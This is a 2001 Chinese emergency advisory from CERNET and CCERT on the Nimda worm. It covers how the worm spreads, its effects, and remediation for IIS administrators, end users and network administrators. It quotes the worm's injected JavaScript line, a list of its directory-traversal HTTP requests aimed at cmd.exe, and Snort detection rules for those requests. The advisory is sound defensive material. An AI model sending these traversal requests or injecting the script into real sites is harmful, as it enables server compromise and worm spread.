首页

CERNET& CCERT关于防范Nimda蠕虫病毒的紧急通知

9月18日,一种更具破坏力的恶意代码-- Nimda worm 蠕虫开始在Internet上迅速蔓延 传播。Nimda蠕虫病毒感染Windows 系列多种 计算机系统,通过多种渠道传播,其传播速度 之快、影响范围之广、破坏力之强都超过 Code Red II。 目前已经检测到大量被感染的计算机系统, 危害严重,希望各部门紧密关注。为了确保 中国教育和科研计算机网CERNET的安全可靠 运行,提高抗攻击能力,特对全网的各级网络 运行管理中心发出此紧急通知。    一 、影响系统 Windows95, 98,ME,NT 和2000 所有客户端 和服务器系统 二 、传播方式 n 通过电子邮件从一个客户端感染另一个 客户端 n 通过开放的网络共享从一个客户端感染 另一个客户端 n 通过浏览被感染的网站从Web 服务器感染 客户端 n 通过主动扫描或利用 "Microsoft IIS 4.0 / 5.0 directory traversal" 的缺陷" 从客户端感染Web 服务器 n 通过扫描 "Code Red" (IN-2001-09),和 "sadmind/IIS" (CA-2001-11) 留下的后门 从客户端感染Web 服务器 三 、影响 感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda 病毒的邮件的拷贝。 同样的,客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒 留下的后门:Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]; 它也试图利用IIS Directory Traversal 漏洞 (VU #111677)。 初步分析表明, 该病毒除了改变网页的目录 以繁衍自身外没有其它破坏性的行为。但通 过大量发送电子邮件和扫描网络可以导致 网络的"拒绝服务"(DoS)。 四 、分析 被感染的机器会发送一份Nimda病毒代码复 本到任何在扫描中发现有漏洞的服务器。 一旦在该服务器上运行,蠕虫就会遍历系统 里的每一个目录(甚至包括所有通过共享文 件可以读取得目录),然后会在磁盘里留下 一份自身拷贝,取名为"README.EML"。一 旦找到了含有web内容的目录(包含html或 asp文件),下面Javascript代码段就会被 添加到每一个跟web有关的文件中: window.open("readme.eml", null, "resizable=no,top=6000,left=6000") 这段代码使得蠕虫可以进一步繁衍,通过 浏览器或浏览网络文件感染到新的客户端。 通过浏览器传播 作为感染过程的一部分,Nimda 更改所有 的含有web内容的文件(象 .htm, ,html, .asp 等文件)。这样,任何用户浏览该 文件,不管是通过浏览器还是网络,就可能 会下载一份该病毒。有些浏览器会自动的 执行下载动作,感染正在浏览该网站的机器。 通过文件系统感染 Nimda病毒生成大量的自身的复本,取名为 README.EML, 写到该用户有可写权限的目 录里。如果在另一台机器的用户通过网络共 享选取病毒文件,并且设置了预览功能的话, 蠕虫就会威胁到这台新的机器。 系统记录 对任何开放80/tcp端口的web服务器, Nimda蠕虫的扫描会生成下面的日志: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/ cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c.. /winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c.. /winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/.. \xc1\x1c../..\xc1\x1c../..\xc1 \x1c../winnt/system32/cmd.exe? /c+dir GET /scripts/..\xc1\x1c../winnt/ system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt /system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/ system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/ system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/ system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/ system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/ system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/ system32/cmd.exe?/c+dir 注:这个例子的前四行表明在试图连接RedCode II 留下的后门,例子的其余部分在试图利用 Directory Traversal 漏洞。 五 、解决方案 各级网络中心和联网单位网络中心领导必须高度 重视抵抗本次病毒工作,迅速组织网络运行 管理人员, 密切监视网络运行状态,一旦 发现此类蠕虫,立即报告CERNET国家网络中心 紧急响应组织CCERT,并根据CCERT要求的处理 程序,迅速采取处理措施。       5.1 对IIS系统管理员的建议 1. 检查系统是否被感染,查找以下内容: ¨ root.exe (表明系统受到过Code Red II 或sadmind/IIS蠕虫的损害,易于受到Nimdaa 蠕虫的攻击) ¨ 在包含网络内容的目录下的admin.dll或 异常.eml文件(表明受到Nimdaa蠕虫的攻击) 要从损害中恢复系统,只有从安全的来源重装 系统和系统软件(供应商提供的光盘)。重装 后还应安装全部安全补丁。这个过程中系统应 与网络断开连接。如果所有网络服务关闭的话, 也可以从网络下载补丁。 具体的恢复细节可以参考 CERT/CC网站, http://www.cert.org/tech_tips/ win-UNIX-system_compromise.html 2. 从提供商处获取补丁 对所有与IIS相关的漏洞,可以从下面站点下 载补丁: http://www.ccert.edu.cn http://www.microsoft.com/technet/ security/bulletin/MS01-044.asp 5.2 对端用户的建议 1.从提供商处获取补丁 对使用有漏洞的IE的用户,建议从下面下载 针对Automatic Execution of EmbeddedMIMETypes漏洞的补丁: http://www.microsoft.com/technet /security/bulletin/MS01-020.asp 2.运行和维护防病毒产品 升级反病毒软件是重要的,多数反病毒软件供 应商已经提供病毒库或相关信息和工具, 从而提供对系统 的保护并能部分恢复系统。如果反病毒软件 包能够自动升级,建议使用自动升级。 3.在打补丁之前,不要查看来历不明的 电子邮件,更不能打开附件。 Nimdaa蠕虫可以作为email的readme.exe附件, 不能打开这种附件。 如果使用Outlook Express ,这种邮件连看 都不能看。 4.关闭JavaScript,Nimdaa蠕虫可以利用 网页浏览感染端用户的系统,这种感染方式 利用JavaScript传播,因此建议关闭 JavaScript。 5.3 对网络管理员的建议:   (1) 立即通知所有网络用户关于Nimda的 危害和防御办法; (2) 采用监听工具及时发现被红色蠕虫 病毒感染的主机系统,在入侵检测系统中增加 如下特征的检测规则: alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /scripts/root.exe"; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /MSADC/root.exe"; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /c/winnt "; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /d/winnt "; nocase;) alert tcp !$HOME_NET any -> $HOME_NE T80 (msg:"Nimda worm "; content: "GET /scripts/.. "; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /_vti_bin/.. "; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /_mem_bin/.. "; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: "GET /msadc/.."; nocase;) alert tcp !$HOME_NET any -> $HOME_NET 80 (msg:"Nimda worm "; content: " GET /system32/cmd.exe "; nocase;) (3) 发现感染主机,立即向CCERT报告被感 染的主机地址、Web访问日志及其相关信息。 CERNET紧急响应组CCERT的联系办法如下:       电话: 010-62784301   传真 : 010-62785933 URL: www.ccert.edu.cn Email: report @ccert.edu.cn   *****Norton AntiVirus 7.0完全版****** ***********存放在FTP服务器上********** 中国教育和科研计算机网CERNET 中国教育和科研计算机网应急响应组CCERT 2001年9月19日

来源: 网络中心 添加时间: 2001年9月20日